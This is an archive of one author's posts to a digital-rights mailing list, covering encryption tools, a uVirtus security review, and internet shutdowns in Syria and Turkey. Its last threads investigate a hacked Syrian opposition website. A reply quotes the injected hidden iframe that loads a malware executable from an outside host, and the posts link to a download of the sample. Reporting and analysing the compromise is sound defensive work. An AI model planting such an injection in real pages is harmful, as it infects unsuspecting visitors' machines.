Re: [liberationtech] Emergency: Has TrueCrypt.org been Hijacked?

2014-05-28 Thread KheOps
On Wed, May 28, 2014 at 01:44:12PM -0700, Brad Beckett wrote:
 Truecrypt.org now redirects to: http://truecrypt.sourceforge.net/ with a
 warning to use Bitlocker and not Truecrypt.

Hard to tell whether it's a hijack or an actual warning message. Does it
make sense that TrueCrypt development could have ended with the
termination of the support of Windows XP?

I'd be glad to hear more info on this!

KheOps


-- 
Liberationtech is public  archives are searchable on Google. Violations of 
list guidelines will get you moderated: 
https://mailman.stanford.edu/mailman/listinfo/liberationtech. Unsubscribe, 
change to digest, or change password by emailing moderator at 
compa...@stanford.edu.


[liberationtech] Secure voice chat: any security review of Linphone?

2014-03-29 Thread KheOps
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Hi all,

Some people may know Linphone¹, a SIP client that supports TLS and ZRTP
and which is thus a good candidate to be advised for secure voice chat
over the Internet.

I'm using it, notably because it is much lighter on the CPU than Jitsi².
I would like to know if anyone already took a look at Linphone's source
code and did a security review of it?

Thanks,
KheOps

¹ http://www.linphone.org
² https://jitsi.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v2.0.22 (GNU/Linux)

iQEcBAEBAgAGBQJTN3xQAAoJEK9g/8GX/m3dv90H/0+CpJg26guc7RKnE68wy9hQ
X7iZPStgRgPeNzUGgA3StHf/dbOr8YfFD3CoCayXa0DIWmieLNLarb6F+AGKDBEO
s1a96SAoBj/yrUfmh17Sim88lOtfn04F3RXpoC4c7a30I/COfl9AeOt/FIjZs41V
RfmhdB0+4ZcxFT8B07PgNgBvwSz3D7dUi5Ogh96vC+gHHjDJOPtEtM2OFPOTYMU6
U6ONzZbbkZ4+nfHiBPzKhA5mdNkQvQK81wvlCxxxvoI1jV2lw8ZvkL4DYjrZBCyJ
ALTQA2cPknZfc0u/ekYrm7SpvHqksDJCwsyT4nsJ6q6RD3WyqF6yvJxX4t2vueQ=
=kxxG
-END PGP SIGNATURE-
-- 
Liberationtech is public  archives are searchable on Google. Violations of 
list guidelines will get you moderated: 
https://mailman.stanford.edu/mailman/listinfo/liberationtech. Unsubscribe, 
change to digest, or change password by emailing moderator at 
compa...@stanford.edu.

Re: [liberationtech] Ostel: encrypted phone calls

2014-02-20 Thread KheOps
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Hello,

On Wed, Jun 12, 2013 at 02:52:51PM -0400, Mark Belinsky wrote:
 We've updated the app and the website a bunch this week. We hope that it's
 even more useful and functional now.
 
 Please go to ostel.co and start using our tool for encrypted phone calls.
 We'd love to hear feedback. Thanks!

I've tried a bit more Ostel.co, from a Linux machine. It seems to work
pretty well, even though I should test it more thoroughly.

I would like to suggest adding 'linphone' to the list of software that
works for Linux on that page: https://ostel.co/about. I just tried it,
it has support for ZRTP and is much lighter on the CPU and RAM than
Jitsi.

I cannot tell whether there has been any security review of linphone,
though.

 
 
 --*
 @mbelinsky https://twitter.com/mbelinsky |
 markbelinsky.comhttps://markbelinsky.com| phone:
 +1-347-466-9327 | skype: markontheline
 *

Cheers,
KheOps

-BEGIN PGP SIGNATURE-
Version: GnuPG v2.0.22 (GNU/Linux)

iQEcBAEBAgAGBQJTBjCdAAoJEK9g/8GX/m3dGhwH/0m2OexjCcRT9Ix7bBo6+psG
0Vzh1Y14G/twEnDnyRbA6Ct0ayQTn8I95RmmYf2Ry/tg+8znbtowNafviaQl0TRW
1yAhuVpzhIAb7+PnUSw5WGDqgKQVK26cHjpuHZcHtqm143q1lis3auefA/zY/dEO
GWLnaiyNKRWKWG0rN/h8WrTubh1EV72nUhYRiZuilgvXm4GER71oRa25bieSlV7z
AxL8qC1u/T5wFo6b8iGQJaMOca0sm7JaBKmsGUBMpE52mYSITrgKgr/NwvwF4wnj
QGXPLzi9zEZtT9Es4Feacdbi+tlIHvddNbAMsv3mXC46/5vt4or3R8HgNcBp2ws=
=ZDVV
-END PGP SIGNATURE-
-- 
Liberationtech is public  archives are searchable on Google. Violations of 
list guidelines will get you moderated: 
https://mailman.stanford.edu/mailman/listinfo/liberationtech. Unsubscribe, 
change to digest, or change password by emailing moderator at 
compa...@stanford.edu.


Re: [liberationtech] uVirtus Linux, encrypted OS for Syria: a security review

2014-02-07 Thread KheOps
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

On Fri, Feb 07, 2014 at 11:25:31AM +0200, Maxim Kammerer wrote:
 On Fri, Feb 7, 2014 at 2:37 AM, Sahar Massachi sa...@brandeis.edu wrote:
  The fact that there's a naked sudo hole is brutal.
 
  Forgive me if I misunderstand the problem, but how could *anyone* ship a
  distribution with a passwordless sudo? That seems like it requires
  deliberate malice to even set up.
 
 Careful here: Tails had passwordless sudo prior to v0.11, less than 2
 years ago. So either unlimited local root access is not such a big
 deal, or recommendation to use Tails is short-sighted — in either case
 the report has a problem. I suggest that the report author sweeps both
 issues under the carpet simultaneously using a politically correct
 language referencing problems that were taken care of a long time ago,
 and are not that critical to begin with.

There may be two differents things mixed here.

First, recommending the use of Tails instead of uVirtus is not just
related to the passwordless root access. You probably noticed by reading
the report that there are numerous other issues in and around uVirtus
that make Tails undoubtedly a safer (and possibly easier to use) choice.
Possibly not the only choice though, as this is mentioned in the
conclusion with a link to a comparative study between IprediaOS, Liberté
Linux, Privatix, Tails and Whonix. The idea was to avoid just saying
Hey, you're using uVirtus, too bad for you, but to also give a link to
better solutions in overall. It is a misundertanding to think that I
sweep under the carpet the root issue and Tails at the same time: I
would perform the same recommendation even without this issue.

Second, on the passwordless issue itself. It may be a matter of
interpretation, but considering that any executable program using sudo
can get unlimited access seems problematic to me. As mentioned in the
report, in Syria a common method of attack is to fool users in
downloading and executing malicious programs disguised as something
else. If one manages to have the user do this from uVirtus, it looks to
me quite easy then to perform nasty stuff such as messing around with
the data contained on the local hard disks. Maybe it is not so easy to
do, making the issue not that critical as you state, in which case I
think it'd be useful to justify a bit the claim. But then maybe this
depends on other security features of the system you're considering, and
in uVirtus the fact that this issue is surrounded by many others seems
to make it quite critical.

The Tails ChangeLog¹ I found for 0.11 does not seem to explain why the
passwordless root was removed, but my guess would go towards security
concerns.

Best,
KheOps

¹ https://git-tails.immerda.ch/tails/plain/debian/changelog?id=0.11
-BEGIN PGP SIGNATURE-
Version: GnuPG v2.0.22 (GNU/Linux)

iQEcBAEBAgAGBQJS9NSYAAoJEK9g/8GX/m3dz3AIAI7UyyRYH5mJbUAIAlUcGRQp
cKeTneIMeAheJGiaBQm+gMypL0x8hA5Q2lioZyXGnP2NyU4OG+ktJCOSguflXDx2
9IqeKoyrS9bp6AJAY2A+a361wN28OgQr6gPc7C+s8DNDNcv6v4LksD1MphS1j01Y
uHJ4OcuN1AqzvZbGK22nkAewT89qF4YzEraHoWpqlUZEh+hvxBfYScipWA/h8wMD
xCU1ZZyJVyYtEOHpV15Oja1DXtLrL5Db9uizI6k8UtHEgn+KxNq6wQb66tmDiwNs
9AJAD8ndc6oz5cEkQtOaMvqVVMDyTGWJwHS7zU3Zaj6LtDJHLizAjhM2Nsz1vKY=
=fj5e
-END PGP SIGNATURE-
-- 
Liberationtech is public  archives are searchable on Google. Violations of 
list guidelines will get you moderated: 
https://mailman.stanford.edu/mailman/listinfo/liberationtech. Unsubscribe, 
change to digest, or change password by emailing moderator at 
compa...@stanford.edu.

[liberationtech] uVirtus Linux, encrypted OS for Syria: a security review

2014-02-06 Thread KheOps
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Dear all,

The uVirtus live distribution was publicized back in September as a
secure live OS specifically designed for Syrians. It stems from the idea
of having a one-click easy to use VPN client that uses OpenVPN over
Obfsproxy.

After testing it and discovering a few issues, I spent some more time in
order to dig a bit more into its security.

I noticed numerous worrying security issues, and in overall it does not
appear to me as really responsible to recommend it instead of, say,
Tails. Issues include for instance holes that may help an attacker
compromise the user's machine by gaining root access and weak protection
against data leaking in cleartext out of the VPN.

I published a report that lists all the issues I could find and tried to
assess their seriousness. I hope it is detailed and precise enough.

It is available here in English:
https://press.telecomix.ceops.eu/en/posts/Review_of_security_issues_in_uVirtus_2.0/

And in Arabic (sorry for the long link):
https://press.telecomix.ceops.eu/ar/posts/%D9%85%D8%B1%D8%A7%D8%AC%D8%B9%D8%A9_%D9%84%D9%82%D8%B6%D8%A7%D9%8A%D8%A7_%D9%86%D8%B8%D8%A7%D9%85_uvirtus_2.0_%D8%A7%D9%84%D8%A3%D9%85%D9%86%D9%8A%D8%A9/

We should thank Ameer, a Telecomix friend who spent a lot of time on
translating it, but also giving me hints and correcting some English
mistakes.

We hope this helps to better assess uVirtus security and maybe feed the
thinking for possible future versions.

Sorry for the TLS certificate warning you will probably get in your
browser, it is signed with the CA you'll find there:
https://github.com/TelecomixSyria/TheSouq/tree/master/resources/ssl-ca/2012-2014

and its SHA1 fingerprint is
C2:00:C7:9B:2C:9F:88:31:8B:A9:9E:B4:37:27:4E:93:75:8A:A7:6B.

With datalove!
KheOps
-BEGIN PGP SIGNATURE-
Version: GnuPG v2.0.22 (GNU/Linux)

iQEcBAEBAgAGBQJS9AoeAAoJEK9g/8GX/m3dpRkH/1rN/nDEjY2kJqhEMqaIwkiq
PqJzXxhvSuMTYn9WXcA5kh9xH+OCBu2uSfTfm9ewfAO8W4C4Jx5AO8jgyo3bjFEP
usJE8m7vaKZVnVUrzqyxMBuutxyljear+qn6r86i5FRbIoob582QAZM7+bunotOr
bc5oUBgaq+KHx0p6yxohQw07MLaDwzXviu0lFcsRqMRfGzAMWFx3y8pGLUwS1Tiz
S3jR+Vs+s80NBHmMhPK3HkB2qsMowC8tZlYaMLzuFqocoKsTyE3CCMz9R6Xw05HT
aR5pSsbVuEvgMyhlqCJoVD8YD4qde8E5hxZrONZk4GKTIPDc90bgGW8FH/zmPqI=
=h+MA
-END PGP SIGNATURE-
-- 
Liberationtech is public  archives are searchable on Google. Violations of 
list guidelines will get you moderated: 
https://mailman.stanford.edu/mailman/listinfo/liberationtech. Unsubscribe, 
change to digest, or change password by emailing moderator at 
compa...@stanford.edu.


Re: [liberationtech] Petition Google over banning Servers on Google Fiber?

2013-08-13 Thread KheOps
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Hi all,

On Tue, Aug 13, 2013 at 01:24:07AM +0200, Moritz Bartl wrote:
 Thank you EFF for the well-written reminder:
 https://www.eff.org/deeplinks/2013/08/google-fiber-continues-awful-isp-tradition-banning-servers

[...]

 We should petition Google to get rid of this. Does anyone know if EFF
 planning such an action, or do you have contacts to organizational
 networks to get it going properly?

A petition is probably worth giving a try, but in the end Google are on their 
infrastructure and selling access under their terms of service, so it may be 
quite a difficult challenge. Even more difficult since, as far as I understand, 
many other operators do the same on the market.

There are similar issues in France: a few ISPs providing high-speed fiber 
connection forbid in the same way hosting a server at home (unless you pay 
more). In addition, some do not provide a fixed IP address to practically make 
things more difficult.

We all understand that this violates Net Neutrality and prevents citizens from 
reclaiming control of their data to have a decent level of privacy. We 
subsequently understand that this is a serious issue from a democracy point of 
view, knowing governments' surveillance practices.

Now, in case it could be of any use in the US, in France  Europe I see two 
types of initiatives that try to push things in a better direction:
- - at the European Parliament some advocacy groups have tried to push the fact 
that a company could not say that they sell internet access if what they sell 
contains violations to Net Neutrality (I don't know the details on the 
situation of this political battle, but you get the idea);
- - in France, we have more and more associative (non-profit) ISPs providing 
internet access to small numbers of people - the core ideas are to provide a 
neutral access (to the extent permitted by law) and promote decentralization 
(as in internet) through the creation of many little structures; the oldest and 
biggest, French Data Network (FDN) created a Federation (FFDN) in which the 
smaller and more local ones are gathered; we would really like this kind of 
initiative to spread - take a look there http://www.ffdn.org, some posts are in 
English

All the best,
KheOps
-BEGIN PGP SIGNATURE-
Version: GnuPG v2.0.20 (GNU/Linux)

iQEcBAEBAgAGBQJSCjM0AAoJEK9g/8GX/m3dUB4IAMh6qFnPhE5L6uQDzWWxGlU1
0Paqfs7OodmOW0DiD1oEbMX3EFAIR341MP7Lck2JDbKRBHqUPw/SJOi9fNUKGujW
Ai5lV9ZVUYudCzsHVqczDorVUKbC7DyYRgVZ+7PJ5KGFzUpt9XGkdPfEGnXmXFOE
2QeYTcUTJzmBG9tjMwh6xpKglrltz4gp1sYyWCEJZuiBea6iBkU15WBiJLZ5zhE+
3a7DnAa9gB+FgVG9bWDx7a2PIH2TOxQ2lEo8P3QrRf7VHZzm7pfxb/PDzpzW6Euw
9UOxddUDg2NPak8fPocWOc/+vqfyLY7VL9gfhmL53tXUbiaPsEkHCfwG7Z0btiU=
=h0AL
-END PGP SIGNATURE-
-- 
Liberationtech is a public list whose archives are searchable on Google. 
Violations of list guidelines will get you moderated: 
https://mailman.stanford.edu/mailman/listinfo/liberationtech. Unsubscribe, 
change to digest, or change password by emailing moderator at 
compa...@stanford.edu.


Re: [liberationtech] Practical Impact of NSA/Surveillance on Human Rights Orgs

2013-07-20 Thread KheOps
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Hey all,

Le 20/07/2013 19:16, Yosem Companys a écrit :

[...]

 Alfredo Lopez from May First/People Link has been writing about 
 the impact of PRISM surveillance on activists, and the
 importance of FLOSS for activists to protect data: 
 http://www.thiscantbehappening.net/node/1842
 
 APC wrote an issue paper on F/A online last year, which includes 
 discussion of the impact of surveillance on organising:
 
 https://www.apc.org/en/pubs/freedom-peaceful-assembly-and-freedom-association


 
And there are of course activists in many countries, such as
 Azerbaijan, who have felt the impact of government surveillance 
 long before PRISM, and who have adopted a number of strategies
 to protect themselves:
 
 http://www.genderit.org/articles/azerbaijan-when-online-security-synonymous-personal-safety


 
I am interested to read others' experiences, and personal
 practices for avoiding surveillance. Did these recent
 revelations convince anyone to abandon gmail, for example?

Even though some organizations are committed to protecting free speech
and information, I do not believe that HR orgs' practices changed in
the light of PRISM revelations.

On the other hand, I think individuals here and there with a varying
level of political activism may have changed a little bit their habits.

On the longer term however, the revelations may help raise awareness
and thus help moving into the right direction, i.e. installing FLOSS
trustworthy software. I think already aware people have a big
responsibility here in explaning, raising awareness and teaching.

- From a less human rights centered perspective, I can tell the status
of European institutions is catastrophic and that I am at the moment
not able to perceive any will from them to turn to using more FLOSS.
EC, EP and EUCJ all run MS Exchange, and the staff seems in general to
be forced to have a particular version of Windows and MS Office. But
again, the matter isn't ignored by everyone and efforts may lead to
interesting developments in a longer future.

Best,
KheOps
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (GNU/Linux)
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/

iQEcBAEBAgAGBQJR6zfBAAoJEK9g/8GX/m3dK7MH/3Fnjz7bkTEulgis1flRdjHQ
KMHlSdr35YFa2E7O3OHHlYmaNjtdbJBAHBwYknJ7JkYYQSHJ65f5qXEdqLcpy9RN
KJx49CofE7xuO5wiFzG22Ol7aR9KFFQSbIxGcI2sULm+YEtVka+KJQxPL1HRVvmL
1dNDmX7sW5Cz7IMF2ZDVm9cUPtipkrAFaYbeTZ84If6qrJdKsiH/IVVENX4YClds
Lbrz3ZR16MI3W8QKk8qTotICCXUHLPt49iDFgQqUVDPx7kIQspp9IkhiSwytl6RK
bXWZDWm1Ff1hlgtfhe+PMjL6Y1oMh28krRL9GKjO6vWYRCKky89n/qno130yLnc=
=vGA5
-END PGP SIGNATURE-
--
Too many emails? Unsubscribe, change to digest, or change password by emailing 
moderator at compa...@stanford.edu or changing your settings at 
https://mailman.stanford.edu/mailman/listinfo/liberationtech

[liberationtech] The Pirate Bay blocked from some Amazon EC2 instances?

2013-07-20 Thread KheOps
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Hello everyone,

Having to play a little bit with a couple of Amazon EC2 virtual
machines, I noticed that I wasn't able to access thepiratebay.sx from
them. The DNS entry is correct, but an HTTP request simply times out.

They are located in the US West 2 set.

A friend having an instance in Europe said he could access
thepiratebay.sx from it without problem.

So, does any of you have any elements regarding this?

Best,
KheOps
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (GNU/Linux)
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/

iQEcBAEBAgAGBQJR6zjMAAoJEK9g/8GX/m3dfJUIAIUvzcnlPXAPA0aH8rVkAZMZ
FkacA+ILPKJYt596dBh7OiiD6IjAkQhmd3GmxCuWZVUIVLYCFqXkkzJKvl7ZnDLG
h970Y0WRvQe4rNr4Kb23ChioI4TfTcp1nGGFQc8etVvKKaYAcrT5fGTldHAYzCQ/
J6MMAC77XA01Nfc+4Z7G2Z2sGb+xyTueHGLeV09Qj7wti5KUCE1dHZ/p9Q6pYkOf
NCtwasYE01F/fTYbEFnICx8VU/M+P62u6+NfAjrUU6Aw25E+WkJSbiOs3feAPxpR
EeNCBudgsp6XRUJp0sUAruVxdhDt4cGgXESeoLJZc5c8pOOZUFBKtZoMe81Hm/g=
=p+v4
-END PGP SIGNATURE-
--
Too many emails? Unsubscribe, change to digest, or change password by emailing 
moderator at compa...@stanford.edu or changing your settings at 
https://mailman.stanford.edu/mailman/listinfo/liberationtech


[liberationtech] Random number generator failure in Rasperri Pis?

2013-07-19 Thread KheOps
Hi all,

Just came accross this article, apparently showing the bad quality of
the hardware RNG in Raspberri Pi devices.

http://scruss.com/blog/2013/06/07/well-that-was-unexpected-the-raspberry-pis-hardware-random-number-generator/

Quite interesting since (pseudo-) random numbers are heavily used in
crypto. Interesting also to see another post on this topic, after the
study of a random number generation procedure formerly used in Cryptocat
and that was also problematic.

Datalove,
KheOps



--
Too many emails? Unsubscribe, change to digest, or change password by emailing 
moderator at compa...@stanford.edu or changing your settings at 
https://mailman.stanford.edu/mailman/listinfo/liberationtech

Re: [liberationtech] Random number generator failure in Rasperri Pis?

2013-07-19 Thread KheOps
Hey,

Le 19/07/2013 14:22, Petter Ericson a écrit :
 Just came accross this article, apparently showing the bad quality of
 the hardware RNG in Raspberri Pi devices.

 http://scruss.com/blog/2013/06/07/well-that-was-unexpected-the-raspberry-pis-hardware-random-number-generator/
 
 I see nothing in the blog post indicating that the random data from the
 Pi HW is bad. Rather, he uses that to show how good random data should look,
 after which he implements RANDU to show how _not_ to do it.
 
 I have seen this being posted here and there as a look, Pi HWrand bad
 thing, but I have to wonder how many actually read the blog post, considering
 he even ran rngtest for a thousand runs with no failures on the output of 
 /dev/hwrng

I might have read it and concluded too fast, and yes obviously he shows
how another implementation is failing.

But I see this:
sudo cat /dev/hwrng | rngtest -c 1000
which for me refers to the previously installed driver for RasPi

and then he says: We were lucky that none of the tests failed for that
run; sometimes there are a few failures. RANDU, on the other hand fares
very badly

Meaning that RANDU is really bad whereas the RasPi one would be ...
better but still failing to pass some tests in some occasions?

That's how I understood it,
KheOps

--
Too many emails? Unsubscribe, change to digest, or change password by emailing 
moderator at compa...@stanford.edu or changing your settings at 
https://mailman.stanford.edu/mailman/listinfo/liberationtech

[liberationtech] DecryptoCat

2013-07-04 Thread KheOps
Hi all,

Just came accross this:
http://tobtu.com/decryptocat.php

Pointing out an apparent set of severe crypto bugs in Cryptocat - but
I'm myself not enough an expert to assess all this.

Any comment?

KheOps

--
Too many emails? Unsubscribe, change to digest, or change password by emailing 
moderator at compa...@stanford.edu or changing your settings at 
https://mailman.stanford.edu/mailman/listinfo/liberationtech

[liberationtech] Blogpost: learning lessons from NSA's PRISM (or: crypto decentralization vs. bulk spying)

2013-06-12 Thread KheOps
Dear all,

I spent some time writing a blogpost aimed at not-so-aware people who
may have heard about PRISM but lack the background knowledge about
massive surveillance and as such could make incorrect decisions if
trying to protect themselves.

https://words.ceops.eu/posts/Learning%20the%20lesson%20from%20NSA%27s%20PRISM:%20don%27t%20do%20it%20wrong/

I wrote it with the hope that it'll be useful and improve the
understanding of these people.

Best and datalove,
KheOps

--
Too many emails? Unsubscribe, change to digest, or change password by emailing 
moderator at compa...@stanford.edu or changing your settings at 
https://mailman.stanford.edu/mailman/listinfo/liberationtech

[liberationtech] Ostel: encrypted phone calls

2013-06-05 Thread KheOps
Hi all,

Just came accross that: https://ostel.co/

Open source software for encrypted calls, with a client that apparently
runs on a lot of platforms.

Anyone ever used/reviewed it already?

Cheers,
KheOps

--
Too many emails? Unsubscribe, change to digest, or change password by emailing 
moderator at compa...@stanford.edu or changing your settings at 
https://mailman.stanford.edu/mailman/listinfo/liberationtech

Re: [liberationtech] internet blackout in turkey?

2013-06-01 Thread KheOps
Good day everyone,

Le 01/06/2013 12:50, hc voigt a écrit :
 Everything that is coming through along the hashtags #occupygezi or
 #direngezipark? is coming from outside Istanbul and lacks any new infos
 and pictures from within the city; or even from within turkey.
 
 After having done so last night, I'm again observing for quite some time
 now again via twazzup, tumblr, g+, diaspora, ? and it looks to me like
 we face a complete Internet Blackout in/from Turkey.

I am not sure to what extent the blackout is complete. A message was
addressed to telecomix earlier on: http://pastebin.com/Y9iJTWEP

I'd say they've cut GSM access as well as broadband in some areas, and
possibly increased blockade of some particular websites at country level.

Would be nice to get more details, though.

 
 Does turkey posses the technology, means and skills for that?

Country internet infrastructure is centralized by governmetn-controlled
Turk Telecom. They already do website blockade, iirc based on keywords.
So I think we can assume they have modern enough equipment to perform
blocking and surveillance.

Best,
KheOps

--
Too many emails? Unsubscribe, change to digest, or change password by emailing 
moderator at compa...@stanford.edu or changing your settings at 
https://mailman.stanford.edu/mailman/listinfo/liberationtech

Re: [liberationtech] internet blackout in turkey?

2013-06-01 Thread KheOps
Le 01/06/2013 15:33, Dr.Arif YILDIRIM a écrit :
 No internet blackout in turkey! I am on twitter as purescapism tweeting
 about the protests all over turkey! 

Can you yell which ISP you are using?

We have report that TTNet and Turkcell blocked Facebook and Twitter.

Could it be possible to get more details on this?

--
Too many emails? Unsubscribe, change to digest, or change password by emailing 
moderator at compa...@stanford.edu or changing your settings at 
https://mailman.stanford.edu/mailman/listinfo/liberationtech

[liberationtech] P=NP ?

2013-05-29 Thread KheOps
Dear all,

This is not the first time such a claim is made, but I just came accross
what looks like to be a serious scientific publication claiming that
they prove that P=NP.

In simple words, this would mean that problems that are considered as
needing a lot of computational effort to solve may in fact be solvable
with algorithms that need much less computational time than what is
implemented now. If proven true, this would have a particularly high
impact on a huge number of computational problems. I am however not sure
to what extent this would impact cryptography.

http://arxiv.org/abs/1305.5976

I'd be glad if anyone with enough skills and access to the paper could
give a first opinion on it :)

Cheers,
KheOps

--
Too many emails? Unsubscribe, change to digest, or change password by emailing 
moderator at compa...@stanford.edu or changing your settings at 
https://mailman.stanford.edu/mailman/listinfo/liberationtech

Re: [liberationtech] Internet off in Syria?

2013-05-08 Thread KheOps
Morning/afternoon/evening all,

Le 08/05/2013 09:54, Walid AL-SAQAF a écrit :
 Hi Brian, Tiago and other friends,
 
 I can confirm that users from Syria have stopped using my Alkasir
 servers for accessing the Internet since yesterday at noon. Looking at
 my records, it appears it stopped totally after noticing a decline in
 the number of connections in recent days. It appears that what we feared
 would happen has just happened. 
 
 Let's keep monitoring to see if any are able to get online from Syria. 

My DNS server traffic from Syria also dropped to zero.

Some people have been working overnight to try to see if landlines still
work in some cities, to see if dialup can be used.

Info has been gathered there: https://pad.hacktivist.me/p/landlines


Best,
KheOps

--
Too many emails? Unsubscribe, change to digest, or change password by emailing 
moderator at compa...@stanford.edu or changing your settings at 
https://mailman.stanford.edu/mailman/listinfo/liberationtech

Re: [liberationtech] Internet off in Syria?

2013-05-08 Thread KheOps
Hey,

Le 08/05/2013 16:55, Rafal Rohozinski a écrit :
 The SecDev's Syria Operations Group detected 60 of 67 net blocks
 returning  at 1600 hrs. local time. Connectivity is restored in most
 major cities and governorates with the exception of those with damaged
 infrastructure (see embedded map).  Circumvention systems are back online.
 
 Sources in Syria suggest that the blackout may have been caused by a
 technical error rather than intentionally. 

A 20-hour long technical error, starting more or less during a peak hour
(evening/late evening)?

It sounds a little bit weird to me but who knows :)

 
 Further info at: https://www.facebook.com/Syrian.DS
 
 Rafal
 
 
 On May 8, 2013, at 10:50 AM, Enrique Piraces pira...@hrw.org
 mailto:pira...@hrw.org wrote:
 
 I see a few machines from Syrian Computer Society are accessible.


 On May 8, 2013, at 10:16 AM, Walid AL-SAQAF wrote:

 Hi all,

 It seems connectivity is slowly returning to Syria. I noticed some
 connections from MTN-SYRIA to my server.
 Sincerely,

 Walid

 -

 Walid Al-Saqaf
 Founder  Administrator
 alkasir for mapping and circumventing cyber censorship
 https://alkasir.com

 PGP: https://alkasir.com/doc/admin_alkasir_pub_key.txt


 On Wed, May 8, 2013 at 11:19 AM, KheOps khe...@ceops.eu wrote:
 Morning/afternoon/evening all,

 Le 08/05/2013 09:54, Walid AL-SAQAF a écrit :
 Hi Brian, Tiago and other friends,

 I can confirm that users from Syria have stopped using my Alkasir
 servers for accessing the Internet since yesterday at noon. Looking at
 my records, it appears it stopped totally after noticing a decline in
 the number of connections in recent days. It appears that what we
 feared
 would happen has just happened.

 Let's keep monitoring to see if any are able to get online from Syria.

 My DNS server traffic from Syria also dropped to zero.

 Some people have been working overnight to try to see if landlines still
 work in some cities, to see if dialup can be used.

 Info has been gathered there: https://pad.hacktivist.me/p/landlines


 Best,
 KheOps


 --
 Too many emails? Unsubscribe, change to digest, or change password
 by emailing moderator at compa...@stanford.edu or changing your
 settings at https://mailman.stanford.edu/mailman/listinfo/liberationtech
 --
 Too many emails? Unsubscribe, change to digest, or change password by
 emailing moderator at compa...@stanford.edu or changing your settings
 at https://mailman.stanford.edu/mailman/listinfo/liberationtech

 --
 Too many emails? Unsubscribe, change to digest, or change password by
 emailing moderator at compa...@stanford.edu
 mailto:compa...@stanford.edu or changing your settings at
 https://mailman.stanford.edu/mailman/listinfo/liberationtech
 
 

 --
 Too many emails? Unsubscribe, change to digest, or change password by 
 emailing moderator at compa...@stanford.edu or changing your settings at 
 https://mailman.stanford.edu/mailman/listinfo/liberationtech
 

--
Too many emails? Unsubscribe, change to digest, or change password by emailing 
moderator at compa...@stanford.edu or changing your settings at 
https://mailman.stanford.edu/mailman/listinfo/liberationtech

[liberationtech] PrivacyBox review?

2013-02-05 Thread KheOps
Hi all,

Has anyone ever reviewed the code of PrivacyBox from a security point of
view?

Thank you,
KheOps

--
Unsubscribe, change to digest, or change password at: 
https://mailman.stanford.edu/mailman/listinfo/liberationtech

Re: [liberationtech] Syrian-martyrs.com website probably compromised by virus

2013-01-30 Thread KheOps
Hello,

I wrote a first summary on the case, I will try to keep it up to date
with new data,
https://words.ceops.eu/posts/Infected%20Syrian%20opposition%20website%20spreads%20malware%20to%20its%20visitors/

ALl the best,
KheOps

Le 30/01/2013 00:00, SiNA Rabbani a écrit :
 
 Hi!
 
 I sent the malware to a couple of friends that have a setup ready. If
 you want to try this it might be fun:
 http://docs.cuckoosandbox.org/en/latest/
 
 All the best,
 SiNA
 
 
 KheOps:
 Hey,

 Le 29/01/2013 23:34, SiNA Rabbani a écrit :
 This is the malware:
 https://www.virustotal.com/file/cfdd3a78a895b3f49a39402eb28b0d2134cc3086849a41a6fdfe7d829a0d4dcd/analysis/

 Yes, saw that too.

 However, I don't find any precise description of its behaviour. Like,
 what it does, if it opens any port, sends data to a CC or whatever.

 I have downloaded it there:
 https://resources.telecomix.ceops.eu/material/malwares/

 All the best,



 --SiNA



 SiNA

 Rabbani:
 holly shit:

 iframe name=I1 width=10 height=10 
 src=http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe;


 border=0
 frameborder=0


 :/ if you are running windows don't even go there!!!


 Andrew Lewis:
 I can get to this in 6 hours or so, maybe someone is willing to 
 jump on this before then?

 -Andrew

 On Jan 30, 2013, at 11:06 AM, KheOps khe...@ceops.eu wrote:

 Dear Libtech,

 We just saw that the website : http://www.syrian-martyrs.com
 is probably compromised. Every page of the website contains an 
 iFrame which links to a .exe file which is detected as a virus
 by antivirus software: 
 http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe





 The fact that the HTML code is present at the bottom of each page makes
 me think that the index.php page has been changed in a way
 that makes that iFrame appear on every page of the website,
 after the dynamic content.

 It also probably means that the attackers have some kind of 
 access to the server. My guess would be going to a PHP shell,
 but I'm no expert in this.

 Any help, clue, investigation, would be very welcome :)

 Thank you, KheOps

 -- Unsubscribe, change to digest, or change password at: 
 https://mailman.stanford.edu/mailman/listinfo/liberationtech
 -- Unsubscribe, change to digest, or change password at: 
 https://mailman.stanford.edu/mailman/listinfo/liberationtech





 --
 Unsubscribe, change to digest, or change password at: 
 https://mailman.stanford.edu/mailman/listinfo/liberationtech




 --
 Unsubscribe, change to digest, or change password at: 
 https://mailman.stanford.edu/mailman/listinfo/liberationtech

 
 

--
Unsubscribe, change to digest, or change password at: 
https://mailman.stanford.edu/mailman/listinfo/liberationtech

[liberationtech] Syrian-martyrs.com website probably compromised by virus

2013-01-29 Thread KheOps
Dear Libtech,

We just saw that the website : http://www.syrian-martyrs.com is probably
compromised. Every page of the website contains an iFrame which links to
a .exe file which is detected as a virus by antivirus software:
http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe

The fact that the HTML code is present at the bottom of each page makes
me think that the index.php page has been changed in a way that makes
that iFrame appear on every page of the website, after the dynamic content.

It also probably means that the attackers have some kind of access to
the server. My guess would be going to a PHP shell, but I'm no expert in
this.

Any help, clue, investigation, would be very welcome :)

Thank you,
KheOps

--
Unsubscribe, change to digest, or change password at: 
https://mailman.stanford.edu/mailman/listinfo/liberationtech

Re: [liberationtech] Syrian-martyrs.com website probably compromised by virus

2013-01-29 Thread KheOps
Hey,

Le 29/01/2013 23:34, SiNA Rabbani a écrit :
 This is the malware:
 https://www.virustotal.com/file/cfdd3a78a895b3f49a39402eb28b0d2134cc3086849a41a6fdfe7d829a0d4dcd/analysis/

Yes, saw that too.

However, I don't find any precise description of its behaviour. Like,
what it does, if it opens any port, sends data to a CC or whatever.

I have downloaded it there:
https://resources.telecomix.ceops.eu/material/malwares/

All the best,

 
 
 --SiNA
 
 
 
 SiNA
 
